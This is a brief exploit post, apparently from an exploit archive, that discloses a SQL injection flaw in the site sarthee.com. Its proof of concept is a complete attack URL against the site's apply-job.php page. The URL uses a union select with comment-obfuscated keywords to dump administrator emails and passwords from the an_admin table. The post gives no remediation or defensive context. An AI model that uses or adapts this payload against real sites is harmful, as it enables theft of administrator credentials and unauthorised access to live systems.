-------------------------------------------------------------*
#Exploit Title: sarthee - SQL Injection vulnerability
#Date: 2020-10-05
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo :
https://www.sarthee.com/apply-job.php?id=-674%27%20/*!50000union*/%20select%201,2,3,4,/*!50000group_concat(vemail,0x3a,vpassword,%27%3Cbr%3E%27)*/,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20/*!50000from*/%20an_admin--+
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*